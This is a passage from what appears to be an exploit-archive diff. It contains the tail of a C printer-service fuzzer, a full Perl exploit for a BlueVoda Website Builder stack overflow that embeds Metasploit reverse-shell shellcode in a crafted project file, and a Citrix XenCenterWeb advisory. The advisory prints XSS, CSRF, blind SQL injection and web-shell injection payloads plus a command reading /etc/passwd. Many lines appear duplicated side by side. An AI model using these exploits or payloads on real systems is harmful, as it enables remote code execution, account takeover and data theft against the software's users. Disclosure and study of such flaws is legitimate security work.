if (argc!=2) usage(argv[0]); if (argc!=2) usage(argv[0]);
testPrinters(); testPrinters();
printf("[+] Printer Service Seems to be working.. Fuzzing\n"); printf("[+] Printer Service Seems to be working.. Fuzzing\n");
if ( (argv[1][1]=='u')) { if ( (argv[1][1]=='u')) {
ShowPrinterInfo(NULL,1,3,"[*]"); ShowPrinterInfo(NULL,1,3,"[*]");
testPrinters(); testPrinters();
} }
if ( (argv[1][1]=='a')) { if ( (argv[1][1]=='a')) {
ShowPrinterInfo(NULL,1,1,"[*]"); ShowPrinterInfo(NULL,1,1,"[*]");
testPrinters(); testPrinters();
} }
return(0); return(0);
} }
// milw0rm.com [2007-01-26] // milw0rm.com [2007-01-26]

77
platforms/windows/remote/35714.pl Executable file
View file

@ -0,0 +1,77 @@
source: http://www.securityfocus.com/bid/47753/info
BlueVoda Website Builder is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
BlueVoda Website Builder 11 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` . 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
# ---------
# BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : Inj3ct0r Team + Exploit-Id Team
# Tested in Windows XP sp3 France
# ---------
logo();
my $header = # BlueVoda Project (bvp) Header
"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09";
my $jump = "\xeb\x02\x90\x90" ; # short jump - from BlueVoda.exe
my $call = "\xff\x52\x7c"; # Call - from BlueVoda.exe
my $junk = "\x41" x 321; # Buffer
my $nops = "\x90" x 51; # Nopsled
# windows/shell_reverse_tcp - 340 bytes (http://www.metasploit.com)
# LHOST=127.0.0.1, LPORT=4444, Encoder: x86/call4_dword_xor
my $shell =
"\x29\xc9\x83\xe9\xb1\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\x4e\x5a\xfa\xc3\x83\xee\xfc\xe2\xf4\xb2\xb2\x73\xc3" .
"\x4e\x5a\x9a\x4a\xab\x6b\x28\xa7\xc5\x08\xca\x48\x1c\x56" .
"\x71\x91\x5a\xd1\x88\xeb\x41\xed\xb0\xe5\x7f\xa5\xcb\x03" .
"\xe2\x66\x9b\xbf\x4c\x76\xda\x02\x81\x57\xfb\x04\xac\xaa" .
"\xa8\x94\xc5\x08\xea\x48\x0c\x66\xfb\x13\xc5\x1a\x82\x46" .
"\x8e\x2e\xb0\xc2\x9e\x0a\x71\x8b\x56\xd1\xa2\xe3\x4f\x89" .
"\x19\xff\x07\xd1\xce\x48\x4f\x8c\xcb\x3c\x7f\x9a\x56\x02" .
"\x81\x57\xfb\x04\x76\xba\x8f\x37\x4d\x27\x02\xf8\x33\x7e" .
"\x8f\x21\x16\xd1\xa2\xe7\x4f\x89\x9c\x48\x42\x11\x71\x9b" .
"\x52\x5b\x29\x48\x4a\xd1\xfb\x13\xc7\x1e\xde\xe7\x15\x01" .
"\x9b\x9a\x14\x0b\x05\x23\x16\x05\xa0\x48\x5c\xb1\x7c\x9e" .
"\x26\x69\xc8\xc3\x4e\x32\x8d\xb0\x7c\x05\xae\xab\x02\x2d" .
"\xdc\xc4\xb1\x8f\x42\x53\x4f\x5a\xfa\xea\x8a\x0e\xaa\xab" .
"\x67\xda\x91\xc3\xb1\x8f\xaa\x93\x1e\x0a\xba\x93\x0e\x0a" .
"\x92\x29\x41\x85\x1a\x3c\x9b\xd3\x3d\xab\x31\x5a\xfa\xc2" .
"\x26\x58\xfa\xd2\x12\xd3\x1c\xa9\x5e\x0c\xad\xab\xd7\xff" .
"\x8e\xa2\xb1\x8f\x92\xa0\x23\x3e\xfa\x4a\xad\x0d\xad\x94" .
"\x7f\xac\x90\xd1\x17\x0c\x18\x3e\x28\x9d\xbe\xe7\x72\x5b" .
"\xfb\x4e\x0a\x7e\xea\x05\x4e\x1e\xae\x93\x18\x0c\xac\x85" .
"\x18\x14\xac\x95\x1d\x0c\x92\xba\x82\x65\x7c\x3c\x9b\xd3" .
"\x1a\x8d\x18\x1c\x05\xf3\x26\x52\x7d\xde\x2e\xa5\x2f\x78" .
"\xbe\xef\x58\x95\x26\xfc\x6f\x7e\xd3\xa5\x2f\xff\x48\x26" .
"\xf0\x43\xb5\xba\x8f\xc6\xf5\x1d\xe9\xb1\x21\x30\xfa\x90" .
"\xb1\x8f\xfa\xc3";
my $exploit = $header.$jump.$junk.$call.$shell.$nops;
open(myfile,'>>KedAns.bvp');
print myfile $exploit;
close (myfile);

302
platforms/windows/remote/9106.txt
View file

@ -1,151 +1,151 @@
Secure Network - Security Research Advisory Secure Network - Security Research Advisory
Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities
Systems affected: Citrix XenCenterWeb Systems affected: Citrix XenCenterWeb
Systems not affected: n/a Systems not affected: n/a
Severity: High Severity: High
Local/Remote: Remote Local/Remote: Remote
Vendor URL: http://www.citrix.com Vendor URL: http://www.citrix.com
Author(s): Alberto Trivero a.trivero@securenetwork.it - Author(s): Alberto Trivero a.trivero@securenetwork.it -
Claudio Criscione c.criscione@securenetwork.it Claudio Criscione c.criscione@securenetwork.it
Vendor disclosure: 1/06/2009 Vendor disclosure: 1/06/2009
Vendor acknowledged: 11/06/2009 Vendor acknowledged: 11/06/2009
Vendor patch release: n/a Vendor patch release: n/a
Public disclosure: 06/07/2009 Public disclosure: 06/07/2009
Advisory number: SN-2009-01 Advisory number: SN-2009-01
Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt
*** SUMMARY *** *** SUMMARY ***
Citrix XenCenterWeb is a web interface for Citrix XenServer environment Citrix XenCenterWeb is a web interface for Citrix XenServer environment
management. management.
Users of XenCenterWeb will be able to see a list of Virtual Machines in the Users of XenCenterWeb will be able to see a list of Virtual Machines in the
Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.), Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.),
get basic information about the hosts in the Resource Pools, information about get basic information about the hosts in the Resource Pools, information about
the VMs and also connect to the console of the VMs. the VMs and also connect to the console of the VMs.
Due to poor validation of some user controlled inputs, a variety of attacks Due to poor validation of some user controlled inputs, a variety of attacks
against the application and the underlying server are possible. against the application and the underlying server are possible.
Cross-site scripting, cross-site request forgery, SQL injection and remote Cross-site scripting, cross-site request forgery, SQL injection and remote
command execution attack vectors were identified as well. command execution attack vectors were identified as well.
XSS and CSRF attacks can be performed on the virtual appliance itself, while XSS and CSRF attacks can be performed on the virtual appliance itself, while
the others require the PHP parameter magic_quotes_gpc to be off on the web the others require the PHP parameter magic_quotes_gpc to be off on the web
server. server.
*** VULNERABILITY DETAILS *** *** VULNERABILITY DETAILS ***
(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF) (a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and With the default PHP configuration (register_globals=Off and
magic_quotes_gpc=On), both XSS and CSRF attacks can be executed. magic_quotes_gpc=On), both XSS and CSRF attacks can be executed.
The first XSS attack exploits the lack of sanitization in the username The first XSS attack exploits the lack of sanitization in the username
parameter in edituser.php script and requires the victim to be able to access parameter in edituser.php script and requires the victim to be able to access
configuration scripts: configuration scripts:
https://xencenterweb.loc/config/edituser.php?username=1<script>alert(document.cookie)</script> https://xencenterweb.loc/config/edituser.php?username=1<script>alert(document.cookie)</script>
Under the same conditions, a CSRF attack can be executed to change the Under the same conditions, a CSRF attack can be executed to change the
password of an arbitrary user: password of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd] https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
Another CSRF attack can hard stop a VM of the attacker's choice: Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname] https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
Other XSS vulnerabilities afflict scripts which are accessible by anyone: Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM https://xencenterweb.loc/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM https://xencenterweb.loc/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script> https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script>
https://xencenterweb.loc/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM https://xencenterweb.loc/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><" https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><" https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM https://xencenterweb.loc/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
(b) SQL Injection (b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL The username parameter in the login.php script is vulnerable to a Blind SQL
Injection attack. Injection attack.
An attacker can retrieve the whole database schema through specially crafted An attacker can retrieve the whole database schema through specially crafted
requests. requests.
Here is an example proof of concept: Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE
'root@%', benchmark(1000000,sha1('test')), 'false')/* 'root@%', benchmark(1000000,sha1('test')), 'false')/*
Obviously, other high profile attacks can be performed through this attack Obviously, other high profile attacks can be performed through this attack
vector. vector.
(c) Remote Command Execution (c) Remote Command Execution
An attacker could write arbitrary data in the file An attacker could write arbitrary data in the file
/usr/local/lib/php/include/config.ini.php /usr/local/lib/php/include/config.ini.php
through the file /var/www/config/writeconfig.php. Due to this unsecure behavior, through the file /var/www/config/writeconfig.php. Due to this unsecure behavior,
arbitrary commands can be executed on the machine. arbitrary commands can be executed on the machine.
If a victim with the proper authorization follows this link: If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> <?php $cmd = https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> <?php $cmd =
$_REQUEST['cmd']; passthru($cmd); ?> <?php $xen = ' $_REQUEST['cmd']; passthru($cmd); ?> <?php $xen = '
or this URL encoded version: or this URL encoded version:
https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27 https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27
an attacker can then simply execute commands on the system through the an attacker can then simply execute commands on the system through the
console.php file: console.php file:
https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd; https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd;
*** EXPLOIT *** *** EXPLOIT ***
Attackers may exploit these issues through a common browser as explained Attackers may exploit these issues through a common browser as explained
above. above.
*** FIX INFORMATION *** *** FIX INFORMATION ***
No patch is currently provided by Citrix, and the application download has No patch is currently provided by Citrix, and the application download has
been removed. been removed.
Citrix officially stated that "the tool was created to demonstrate how the SDK Citrix officially stated that "the tool was created to demonstrate how the SDK
could be used to create unique solutions. Customers currently using it should could be used to create unique solutions. Customers currently using it should
assess the risks of continued use in light of your findings and, if these prove assess the risks of continued use in light of your findings and, if these prove
to be unacceptable, discontinue usage". to be unacceptable, discontinue usage".
*** WORKAROUNDS *** *** WORKAROUNDS ***
Common web application workarounds apply, like virtual patching from a web Common web application workarounds apply, like virtual patching from a web
application firewall or similar solutions. However most of the reported issues application firewall or similar solutions. However most of the reported issues
can be mitigated by running the application only inside the virtual appliance can be mitigated by running the application only inside the virtual appliance
or in properly configured web servers. or in properly configured web servers.
Secure Network would like to thank Citrix for its support during the Secure Network would like to thank Citrix for its support during the
disclosure process. disclosure process.
********************* *********************
*** LEGAL NOTICES *** *** LEGAL NOTICES ***
********************* *********************
Secure Network (www.securenetwork.it) is an information security company, Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security which provides consulting and training services, and engages in security
research and development. research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure. whenever possible with software developers for properly handling disclosure.
This advisory is copyright 2009 Secure Network S.r.l. Permission is This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network. databases and similars, provided that due credit is given to Secure Network.
The information in the advisory is believed to be accurate at the time of The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information. research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect, Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, or consequential loss or damage arising from use of, or reliance on,
this information. this information.
If you have any comments or inquiries, or any issue with what is reported If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible. in this advisory, please inform us as soon as possible.
E-mail: securenetwork {at} securenetwork.it E-mail: securenetwork {at} securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788 Phone: +39 02 24126788
# milw0rm.com [2009-07-10] # milw0rm.com [2009-07-10]